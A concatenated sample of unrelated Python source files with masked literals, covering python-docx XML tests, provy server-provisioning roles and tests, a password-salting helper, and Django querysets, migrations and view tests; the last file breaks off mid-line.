new ( rId , reltype , target ) <EOL> else : <EOL> rel = CT_Relationship . new ( rId , reltype , target , target_mode ) <EOL> builder = a_Relationship ( ) . with_target ( target ) <EOL> if target_mode == RTM . EXTERNAL : <EOL> builder = builder . with_target_mode ( RTM . EXTERNAL ) <EOL> expected_rel_xml = builder . xml <EOL> assert rel . xml == expected_rel_xml <EOL> class DescribeCT_Relationships ( object ) : <EOL> def it_can_construct_a_new_relationships_element ( self ) : <EOL> rels = CT_Relationships . new ( ) <EOL> expected_xml = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> assert serialize_for_reading ( rels ) == expected_xml <EOL> def it_can_build_rels_element_incrementally ( self ) : <EOL> rels = CT_Relationships . new ( ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> rels . add_rel ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_rels_xml = a_Relationships ( ) . xml <EOL> assert serialize_for_reading ( rels ) == expected_rels_xml <EOL> def it_can_generate_rels_file_xml ( self ) : <EOL> expected_xml = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> ) <EOL> assert CT_Relationships . new ( ) . xml == expected_xml <EOL> class DescribeCT_Types ( object ) : <EOL> def it_provides_access_to_default_child_elements ( self ) : <EOL> types = a_Types ( ) . element <EOL> assert len ( types . defaults ) == <NUM_LIT:2> <EOL> for default in types . defaults : <EOL> assert isinstance ( default , CT_Default ) <EOL> def it_provides_access_to_override_child_elements ( self ) : <EOL> types = a_Types ( ) . element <EOL> assert len ( types . overrides ) == <NUM_LIT:3> <EOL> for override in types . overrides : <EOL> assert isinstance ( override , CT_Override ) <EOL> def it_should_have_empty_list_on_no_matching_elements ( self ) : <EOL> types = a_Types ( ) . empty ( ) . element <EOL> assert types . defaults == [ ] <EOL> assert types . overrides == [ ] <EOL> def it_can_construct_a_new_types_element ( self ) : <EOL> types = CT_Types . new ( ) <EOL> expected_xml = a_Types ( ) . empty ( ) . xml <EOL> assert types . xml == expected_xml <EOL> def it_can_build_types_element_incrementally ( self ) : <EOL> types = CT_Types . new ( ) <EOL> types . add_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_default ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> types . add_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_types_xml = a_Types ( ) . xml <EOL> assert types . xml == expected_types_xml </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import pytest <EOL> from docx . opc . constants import CONTENT_TYPE as CT <EOL> from docx . opc . package import OpcPackage <EOL> from docx . oxml . styles import CT_Styles <EOL> from docx . parts . styles import StylesPart <EOL> from docx . styles . styles import Styles <EOL> from . . unitutil . mock import class_mock , instance_mock <EOL> class DescribeStylesPart ( object ) : <EOL> def it_provides_access_to_its_styles ( self , styles_fixture ) : <EOL> styles_part , Styles_ , styles_ = styles_fixture <EOL> styles = styles_part . styles <EOL> Styles_ . assert_called_once_with ( styles_part . element ) <EOL> assert styles is styles_ <EOL> def it_can_construct_a_default_styles_part_to_help ( self ) : <EOL> package = OpcPackage ( ) <EOL> styles_part = StylesPart . default ( package ) <EOL> assert isinstance ( styles_part , StylesPart ) <EOL> assert styles_part . partname == '<STR_LIT>' <EOL> assert styles_part . content_type == CT . WML_STYLES <EOL> assert styles_part . package is package <EOL> assert len ( styles_part . element ) == <NUM_LIT:6> <EOL> @ pytest . fixture <EOL> def styles_fixture ( self , Styles_ , styles_elm_ , styles_ ) : <EOL> styles_part = StylesPart ( None , None , styles_elm_ , None ) <EOL> return styles_part , Styles_ , styles_ <EOL> @ pytest . fixture <EOL> def Styles_ ( self , request , styles_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , return_value = styles_ <EOL> ) <EOL> @ pytest . fixture <EOL> def styles_ ( self , request ) : <EOL> return instance_mock ( request , Styles ) <EOL> @ pytest . fixture <EOL> def styles_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Styles ) </s>
<s> class ConfigurationError ( RuntimeError ) : <EOL> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> from provy . core import Role <EOL> from provy . more . debian . package . aptitude import AptitudeRole <EOL> class VarnishRole ( Role ) : <EOL> '''<STR_LIT>''' <EOL> def provision ( self ) : <EOL> '''<STR_LIT>''' <EOL> with self . using ( AptitudeRole ) as aptitude : <EOL> aptitude . ensure_package_installed ( '<STR_LIT>' ) <EOL> def ensure_vcl ( self , template , varnish_vcl_path = '<STR_LIT>' , options = { } , owner = None ) : <EOL> '''<STR_LIT>''' <EOL> result = self . update_file ( template , varnish_vcl_path , options = options , sudo = True , owner = owner ) <EOL> if result : <EOL> self . log ( '<STR_LIT>' ) <EOL> self . ensure_restart ( ) <EOL> def ensure_conf ( self , template , varnish_conf_path = '<STR_LIT>' , options = { } , owner = None ) : <EOL> '''<STR_LIT>''' <EOL> result = self . update_file ( template , varnish_conf_path , options = options , sudo = True , owner = owner ) <EOL> if result : <EOL> self . log ( '<STR_LIT>' ) <EOL> self . ensure_restart ( ) <EOL> def cleanup ( self ) : <EOL> '''<STR_LIT>''' <EOL> super ( VarnishRole , self ) . cleanup ( ) <EOL> if '<STR_LIT>' in self . context and self . context [ '<STR_LIT>' ] : <EOL> self . restart ( ) <EOL> def ensure_restart ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . context [ '<STR_LIT>' ] = True <EOL> def restart ( self ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> self . execute ( command , sudo = True ) </s>
<s> import crypt <EOL> from random import SystemRandom <EOL> def random_salt_function ( salt_len = <NUM_LIT:12> ) : <EOL> """<STR_LIT>""" <EOL> charset = "<STR_LIT>" <EOL> charset = charset + charset . upper ( ) + '<STR_LIT>' <EOL> chars = [ ] <EOL> rand = SystemRandom ( ) <EOL> for _ in range ( salt_len ) : <EOL> chars . append ( rand . choice ( charset ) ) <EOL> return "<STR_LIT>" . join ( chars ) <EOL> def hash_password_function ( password , salt = None , magic = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> magic = str ( magic ) <EOL> if salt is None : <EOL> salt = random_salt_function ( ) <EOL> salt = "<STR_LIT>" . format ( magic = magic , salt = salt ) <EOL> return crypt . crypt ( password , salt ) </s>
<s> from datetime import datetime , timedelta <EOL> import sys <EOL> from mock import patch , MagicMock <EOL> from nose . tools import istest <EOL> from provy . more . centos import YumRole , PackageNotFound <EOL> from provy . more . centos . package import yum <EOL> from tests . unit . tools . helpers import ProvyTestCase <EOL> class YumRoleTest ( ProvyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( YumRoleTest , self ) . setUp ( ) <EOL> self . role = YumRole ( prov = None , context = { } ) <EOL> @ istest <EOL> def installs_necessary_packages_to_provision ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . provision ( ) <EOL> self . role . ensure_up_to_date . assert_called_once_with ( ) <EOL> self . role . ensure_package_installed . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ istest <EOL> def ensures_gpg_key_is_added ( self ) : <EOL> with self . execute_mock ( ) : <EOL> self . role . ensure_gpg_key ( '<STR_LIT>' ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_repository_exists_in_yum_repos ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT>''' <EOL> result = self . role . has_source ( '<STR_LIT>' ) <EOL> self . assertTrue ( result ) <EOL> execute . assert_called_once_with ( "<STR_LIT>" , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_repository_doesnt_exist_in_apt_source ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '<STR_LIT>' <EOL> result = self . role . has_source ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ istest <EOL> def ensures_a_source_string_is_added_to_the_repos ( self ) : <EOL> source_line = '<STR_LIT>' <EOL> with self . execute_mock ( ) as execute , self . mock_role_method ( '<STR_LIT>' ) as has_source : <EOL> has_source . return_value = False <EOL> self . assertTrue ( self . role . ensure_yum_source ( source_line ) ) <EOL> self . assertTrue ( has_source . called ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' . format ( source_line ) , sudo = True , stdout = False ) <EOL> @ istest <EOL> def doesnt_add_source_if_it_already_exists ( self ) : <EOL> source_line = '<STR_LIT>' <EOL> with self . execute_mock ( ) as execute , self . mock_role_method ( '<STR_LIT>' ) as has_source : <EOL> has_source . return_value = True <EOL> self . assertFalse ( self . role . ensure_yum_source ( source_line ) ) <EOL> self . assertFalse ( execute . called ) <EOL> @ istest <EOL> def gets_update_date_file_as_a_property ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . remote_temp_dir . return_value = '<STR_LIT>' <EOL> self . assertEqual ( self . role . update_date_file , '<STR_LIT>' ) <EOL> @ istest <EOL> def stores_update_date ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) , patch . object ( yum , '<STR_LIT>' ) as mock_datetime : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> when = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mock_datetime . now . return_value = when <EOL> self . role . store_update_date ( ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def gets_last_update_date ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> self . role . remote_exists . return_value = True <EOL> self . role . read_remote_file . return_value = '<STR_LIT>' <EOL> result = self . role . get_last_update_date ( ) <EOL> self . assertEqual ( result , datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . role . remote_exists . assert_called_once_with ( self . role . update_date_file ) <EOL> self . role . read_remote_file . assert_called_once_with ( self . role . update_date_file ) <EOL> @ istest <EOL> def gets_none_as_last_update_if_there_was_no_update_yet ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . update_date_file = '<STR_LIT>' <EOL> self . role . remote_exists . return_value = False <EOL> result = self . role . get_last_update_date ( ) <EOL> self . assertIsNone ( result ) <EOL> self . assertFalse ( self . role . read_remote_file . called ) <EOL> @ istest <EOL> def updates_yum_when_passed_time_limit ( self ) : <EOL> with patch . object ( yum , '<STR_LIT>' ) as mock_datetime , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> now = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> then = now - timedelta ( minutes = <NUM_LIT> ) <EOL> mock_datetime . now . return_value = now <EOL> self . role . get_last_update_date . return_value = then <EOL> self . role . ensure_up_to_date ( ) <EOL> self . role . get_last_update_date . assert_called_once_with ( ) <EOL> self . role . force_update . assert_called_once_with ( ) <EOL> @ istest <EOL> def doesnt_update_if_not_passed_from_time_limit ( self ) : <EOL> with patch . object ( yum , '<STR_LIT>' ) as mock_datetime , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> now = datetime . strptime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> then = now - timedelta ( minutes = <NUM_LIT> ) <EOL> mock_datetime . now . return_value = now <EOL> self . role . get_last_update_date . return_value = then <EOL> self . role . ensure_up_to_date ( ) <EOL> self . assertFalse ( self . role . force_update . called ) <EOL> @ istest <EOL> def forces_an_update ( self ) : <EOL> with self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . role . force_update ( ) <EOL> self . assertTrue ( self . role . context [ '<STR_LIT>' ] ) <EOL> self . role . execute . assert_called_once_with ( '<STR_LIT>' , stdout = False , sudo = True ) <EOL> self . role . store_update_date . assert_called_once_with ( ) <EOL> @ istest <EOL> def checks_that_a_package_is_installed ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT:yes>''' <EOL> self . assertTrue ( self . role . is_package_installed ( '<STR_LIT:foo>' ) ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_is_not_installed ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = '''<STR_LIT>''' <EOL> self . assertFalse ( self . role . is_package_installed ( '<STR_LIT>' ) ) <EOL> execute . assert_called_once_with ( '<STR_LIT>' , sudo = True , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_exists ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> self . assertTrue ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def checks_that_a_package_doesnt_exist ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> execute . return_value = False <EOL> self . assertFalse ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False ) <EOL> @ istest <EOL> def traps_sys_exit_when_checking_if_a_package_exists ( self ) : <EOL> def exit ( * args , ** kwargs ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> execute = MagicMock ( side_effect = exit ) <EOL> with patch ( '<STR_LIT>' , execute ) : <EOL> self . assertFalse ( self . role . package_exists ( '<STR_LIT>' ) ) <EOL> @ istest <EOL> def checks_if_a_package_exists_before_installing ( self ) : <EOL> with self . execute_mock ( ) as execute , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) as ( package_exists , is_package_installed ) : <EOL> is_package_installed . return_value = False <EOL> package_exists . return_value = True <EOL> result = self . role . ensure_package_installed ( '<STR_LIT>' ) <EOL> self . assertTrue ( result ) <EOL> self . assertTrue ( package_exists . called ) <EOL> execute . assert_called_with ( '<STR_LIT>' , stdout = False , sudo = True ) <EOL> @ istest <EOL> def fails_to_install_package_if_it_doesnt_exist ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_methods ( '<STR_LIT>' , '<STR_LIT>' ) as ( package_exists , is_package_installed ) : <EOL> is_package_installed . return_value = False <EOL> package_exists . return_value = False <EOL> self . assertRaises ( PackageNotFound , self . role . ensure_package_installed , '<STR_LIT>' ) <EOL> self . assertTrue ( package_exists . called ) <EOL> @ istest <EOL> def doesnt_install_package_if_already_installed ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . is_package_installed . return_value = True <EOL> result = self . role . ensure_package_installed ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) </s>
<s> from mock import patch <EOL> from nose . tools import istest <EOL> from provy . more . debian import ApacheRole , AptitudeRole <EOL> from tests . unit . tools . helpers import ProvyTestCase <EOL> class ApacheRoleTest ( ProvyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ApacheRoleTest , self ) . setUp ( ) <EOL> self . role = ApacheRole ( prov = None , context = { } ) <EOL> @ istest <EOL> def installs_necessary_packages_to_provision ( self ) : <EOL> with self . using_stub ( AptitudeRole ) as aptitude : <EOL> self . role . provision ( ) <EOL> aptitude . ensure_package_installed . assert_called_with ( '<STR_LIT>' ) <EOL> @ istest <EOL> def ensures_module_is_installed_and_enabled ( self ) : <EOL> with self . using_stub ( AptitudeRole ) as aptitude , self . execute_mock ( ) as execute : <EOL> self . role . ensure_mod ( '<STR_LIT:foo>' ) <EOL> aptitude . ensure_package_installed . assert_called_with ( '<STR_LIT>' ) <EOL> execute . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_site_is_available_from_template ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_method ( '<STR_LIT>' ) as update_file , self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . create_site ( '<STR_LIT>' , template = '<STR_LIT>' ) <EOL> update_file . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , options = { } , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_site_is_available_from_template_and_options ( self ) : <EOL> with self . execute_mock ( ) , self . mock_role_method ( '<STR_LIT>' ) as update_file , self . mock_role_method ( '<STR_LIT>' ) : <EOL> self . role . create_site ( '<STR_LIT>' , template = '<STR_LIT>' , options = { '<STR_LIT:foo>' : '<STR_LIT>' } ) <EOL> update_file . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , options = { '<STR_LIT:foo>' : '<STR_LIT>' } , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_that_a_website_is_enabled ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) as remote_symlink : <EOL> self . role . ensure_site_enabled ( '<STR_LIT>' ) <EOL> remote_symlink . assert_called_with ( from_file = '<STR_LIT>' , to_file = '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def ensures_that_a_website_is_disabled ( self ) : <EOL> with self . mock_role_method ( '<STR_LIT>' ) as remove_file : <EOL> self . role . ensure_site_disabled ( '<STR_LIT>' ) <EOL> remove_file . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def can_be_restarted ( self ) : <EOL> with self . execute_mock ( ) as execute : <EOL> self . role . restart ( ) <EOL> execute . assert_called_with ( '<STR_LIT>' , sudo = True ) <EOL> @ istest <EOL> def ensures_that_it_must_be_restarted ( self ) : <EOL> self . assertFalse ( self . role . must_restart ) <EOL> self . role . ensure_restart ( ) <EOL> self . assertTrue ( self . role . must_restart ) <EOL> @ istest <EOL> def must_not_restart_again_if_already_restarted ( self ) : <EOL> with self . execute_mock ( ) : <EOL> self . role . ensure_restart ( ) <EOL> self . role . restart ( ) <EOL> self . assertFalse ( self . role . must_restart ) <EOL> @ istest <EOL> def restarts_on_cleanup_if_must_be_restarted ( self ) : <EOL> with patch ( '<STR_LIT>' ) as restart : <EOL> self . role . ensure_restart ( ) <EOL> self . role . cleanup ( ) <EOL> self . assertTrue ( restart . called ) <EOL> @ istest <EOL> def doesnt_restart_on_cleanup_if_doesnt_need_to_be_restarted ( self ) : <EOL> with patch ( '<STR_LIT>' ) as restart : <EOL> self . role . cleanup ( ) <EOL> self . assertFalse ( restart . called ) </s>
<s> from thumbnails . engines . dummy import DummyEngine <EOL> from thumbnails . engines . pillow_engine import PillowEngine <EOL> from thumbnails . engines . wand_engine import WandEngine <EOL> from thumbnails . engines . pgmagick_engine import PgmagickEngine </s>
<s> """<STR_LIT>""" <EOL> from jinja2 import Template <EOL> from branca . element import MacroElement <EOL> class ScrollZoomToggler ( MacroElement ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ScrollZoomToggler , self ) . __init__ ( ) <EOL> self . _name = '<STR_LIT>' <EOL> self . _template = Template ( """<STR_LIT>""" ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import atexit <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _exithandlers = [ ] <EOL> def _run_exitfuncs ( ) : <EOL> """<STR_LIT>""" <EOL> exc_info = None <EOL> while _exithandlers : <EOL> func , targs , kargs = _exithandlers . pop ( ) <EOL> try : <EOL> func ( * targs , ** kargs ) <EOL> except SystemExit : <EOL> exc_info = sys . exc_info ( ) <EOL> except : <EOL> import traceback <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> traceback . print_exc ( ) <EOL> exc_info = sys . exc_info ( ) <EOL> if exc_info is not None : <EOL> raise exc_info [ <NUM_LIT:0> ] ( exc_info [ <NUM_LIT:1> ] ) <EOL> def register ( func , * targs , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . register ( func , * targs , ** kargs ) <EOL> else : <EOL> _exithandlers . append ( ( func , targs , kargs ) ) <EOL> return func <EOL> def unregister ( func ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . unregister ( func ) <EOL> else : <EOL> handler_entries = [ e for e in _exithandlers if e [ <NUM_LIT:0> ] == func ] <EOL> for e in handler_entries : <EOL> _exithandlers . remove ( e ) <EOL> if not hasattr ( atexit , "<STR_LIT>" ) : <EOL> atexit . register ( _run_exitfuncs ) </s>
<s> import os <EOL> def get_test_rss_path ( ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) </s>
<s> from django . db . models . query import QuerySet <EOL> class PostQuerySet ( QuerySet ) : <EOL> def public ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_PUBLIC ) <EOL> def private ( self ) : <EOL> return self . filter ( status__in = [ <EOL> self . model . STATUS_PRIVATE , <EOL> ] ) </s>
<s> from . base import BaseDownloadTests <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . urlresolvers import reverse <EOL> from . . models import OS , Release <EOL> from pages . models import Page <EOL> import json <EOL> User = get_user_model ( ) <EOL> class DownloadViewsTests ( BaseDownloadTests ) : <EOL> def test_download_full_os_list ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_download_release_detail ( self ) : <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . release_275 . slug } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_download_os_list ( self ) : <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . linux . slug } ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_download ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_latest_redirects ( self ) : <EOL> latest_python2 = Release . objects . released ( ) . python2 ( ) . latest ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertRedirects ( response , latest_python2 . get_absolute_url ( ) ) <EOL> latest_python3 = Release . objects . released ( ) . python3 ( ) . latest ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> response = self . client . get ( url ) <EOL> self . assertRedirects ( response , latest_python3 . get_absolute_url ( ) ) <EOL> class DownloadApiViewsTest ( BaseDownloadTests ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> self . staff_user = User . objects . create_user ( <EOL> username = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> ) <EOL> self . staff_user . is_staff = True <EOL> self . staff_user . save ( ) <EOL> self . staff_key = self . staff_user . api_key . key <EOL> self . Authorization = "<STR_LIT>" % ( self . staff_user . username , self . staff_key ) <EOL> def json_client ( self , method , url , data = None , ** headers ) : <EOL> if not data : <EOL> data = { } <EOL> client_method = getattr ( self . client , method . lower ( ) ) <EOL> return client_method ( url , json . dumps ( data ) , content_type = '<STR_LIT:application/json>' , ** headers ) <EOL> def test_get_os ( self ) : <EOL> url = '<STR_LIT>' <EOL> self . client . logout ( ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_post_os ( self ) : <EOL> url = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_delete_os ( self ) : <EOL> url = '<STR_LIT>' % OS . objects . all ( ) [ <NUM_LIT:0> ] . pk <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_release ( self ) : <EOL> url = '<STR_LIT>' <EOL> self . client . logout ( ) <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_post_release ( self ) : <EOL> release_page = Page . objects . create ( <EOL> title = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> content = '<STR_LIT>' <EOL> ) <EOL> url = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' % release_page . pk <EOL> } <EOL> self . client . logout ( ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> response = self . json_client ( '<STR_LIT>' , url , data , HTTP_AUTHORIZATION = self . Authorization ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) </s>
<s> import datetime <EOL> from django . db . models import Q <EOL> from django . db . models . query import QuerySet <EOL> from django . utils import timezone <EOL> class JobTypeQuerySet ( QuerySet ) : <EOL> def active ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter ( active = True ) <EOL> def with_active_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . active ( ) . filter ( <EOL> jobs__status = '<STR_LIT>' , <EOL> jobs__expires__gte = now , <EOL> ) . distinct ( ) <EOL> class JobCategoryQuerySet ( QuerySet ) : <EOL> def active ( self ) : <EOL> return self . filter ( active = True ) <EOL> def with_active_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . filter ( <EOL> jobs__status = '<STR_LIT>' , <EOL> jobs__expires__gte = now , <EOL> ) . distinct ( ) <EOL> class JobQuerySet ( QuerySet ) : <EOL> def approved ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_APPROVED ) <EOL> def archived ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_ARCHIVED ) <EOL> def draft ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_DRAFT ) <EOL> def expired ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_EXPIRED ) <EOL> def rejected ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_REJECTED ) <EOL> def removed ( self ) : <EOL> return self . filter ( status__exact = self . model . STATUS_REMOVED ) <EOL> def featured ( self ) : <EOL> return self . filter ( is_featured = True ) <EOL> def review ( self ) : <EOL> review_threshold = timezone . now ( ) - datetime . timedelta ( days = <NUM_LIT> ) <EOL> return self . filter ( <EOL> Q ( status__exact = self . model . STATUS_REVIEW ) & <EOL> Q ( created__gte = review_threshold ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> def visible ( self ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> return self . filter ( <EOL> Q ( status__exact = self . model . STATUS_APPROVED ) & <EOL> Q ( expires__gte = now ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT:30> , default = '<STR_LIT>' , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT:html>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> import os <EOL> from bs4 import BeautifulSoup <EOL> from django . test import TestCase <EOL> from django . conf import settings <EOL> from django . core . management import call_command <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . test . utils import override_settings <EOL> from pages . models import Image <EOL> FAKE_PEP_REPO = os . path . join ( settings . BASE , '<STR_LIT>' ) <EOL> class PEPManagementCommandTests ( TestCase ) : <EOL> @ override_settings ( PEP_REPO_PATH = '<STR_LIT>' ) <EOL> def test_generate_pep_pages ( self ) : <EOL> with self . assertRaises ( ImproperlyConfigured ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> @ override_settings ( PEP_REPO_PATH = FAKE_PEP_REPO ) <EOL> def test_generate_pep_pages_real ( self ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> @ override_settings ( PEP_REPO_PATH = FAKE_PEP_REPO ) <EOL> def test_image_generated ( self ) : <EOL> call_command ( '<STR_LIT>' ) <EOL> img = Image . objects . get ( page__path = '<STR_LIT>' ) <EOL> soup = BeautifulSoup ( img . page . content . 